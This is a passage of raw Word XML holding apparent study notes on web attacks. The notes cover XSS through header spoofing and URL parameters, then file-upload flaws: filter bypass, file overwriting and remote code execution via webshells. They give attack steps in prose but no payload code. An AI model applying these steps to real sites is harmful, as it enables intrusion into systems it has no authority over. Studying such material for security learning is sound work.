        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commonly found on blog post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D868345" w14:textId="77777777" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Logout of Admin page with Burp active to intercept logout request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C669DA5" w14:textId="77777777" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>In Inspector, add new header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BAA9E5" w14:textId="77777777" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>True-Client-IP and use iframe XSS message in body and forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3909C67E" w14:textId="3379C33E" w:rsidR="00796AEC" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sign back in to confirm success of attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CA27A" w14:textId="7F9F6A44" w:rsidR="00BF1847" w:rsidRPr="0084205E" w:rsidRDefault="00BF1847" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Reflected – run on client-side of web app. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Most commonly found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> when the server doesn’t sanitize search data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCB648" w14:textId="66C6DE30" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When checking an order status, if there is an “id” value in the URL, replacing with an iframe script can cause XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646BE16" w14:textId="29D7BDC5" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Submit and refresh to demonstrate attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5497E5CA" w14:textId="1415930C" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5221B2A4" w14:textId="3B7E89B5" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="007D1D3A" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0075B96D" w14:textId="2172310B" w:rsidR="007D1D3A" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Uploading files to a server, when handled badly, can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> severe vulnerabilities in the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D02BDE" w14:textId="44885C1A" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overwriting existing files on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E423C12" w14:textId="3C259DF1" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uploading and executing shells on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A28F0E2" w14:textId="12B6FA2C" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypassing client-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A83058" w14:textId="77CA339A" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypassing various kinds of server-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A9BF9" w14:textId="7416B033" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fooling content type validation checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25728DEA" w14:textId="3AB1E391" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>General Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574012C" w14:textId="1A1D249A" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration is key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B11EB27" w14:textId="68212104" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Looking at source code for the page to see if client-side filtering is being applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC7982" w14:textId="3702772A" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Scanning with a directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforcer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A25BE6" w14:textId="712B2365" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Sudo apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF9BDCC" w14:textId="23D1FE40" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercepting upload requests with Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1394C6" w14:textId="409C6F36" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Browser extensions such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wappalyser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C6350D2" w14:textId="67BEF784" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Develop basic understanding of how the website is handling input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A7E4A" w14:textId="122CEDB3" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If client-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C475EF" w14:textId="61B76A63" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Take look at code and look to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54793733" w14:textId="740A59ED" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If server-side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28D807" w14:textId="33D97971" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Guess filters, test, adjust based on error message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914C456" w14:textId="5EE8F293" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burp or Zap can be helpful with this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AEDE0D" w14:textId="23A8D377" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overwriting Existing Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC545BD" w14:textId="249B0D67" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically, whenever files are uploaded to a server, checks should be carried out to ensure file will not overwrite anything that already exists on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DE46F" w14:textId="0FB8D44E" w:rsidR="00103C3C" w:rsidRPr="0084205E" w:rsidRDefault="00103C3C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common practice to assign file new name, dates, error returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B57C6B" w14:textId="7158E554" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File permissions prevent pages from being writeable by a regular user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62CEC2" w14:textId="40B7C25A" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7CD16" w14:textId="73163E9D" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and directory of said </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="376CF363" w14:textId="7358B3D0" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=’images/spaniel.jpg’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF721E8" w14:textId="3CFC9742" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload another image with the same name as the one found (spaniel.jpg for example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414396B8" w14:textId="2A4C5BCF" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>See if server will accept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6ADE3A" w14:textId="3EE2BF99" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD34C4" w14:textId="09EEA08C" w:rsidR="0007426D" w:rsidRPr="0084205E" w:rsidRDefault="0007426D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Likely to be a low-privileged user account (such as www-data on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server), still serious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2291D096" w14:textId="0AAFB5C6" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">RCE results from uploading a program written in the same language as the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>back-end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> of the website (or any language the server understands and will exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD1325" w14:textId="56FC9F58" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Usually PHP, can use python Django, JS [node.js])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3479E3F6" w14:textId="497F0B43" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two basic ways to achieve RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DFE880" w14:textId="08A8D1FC" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F8C59D5" w14:textId="4D21E5D3" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
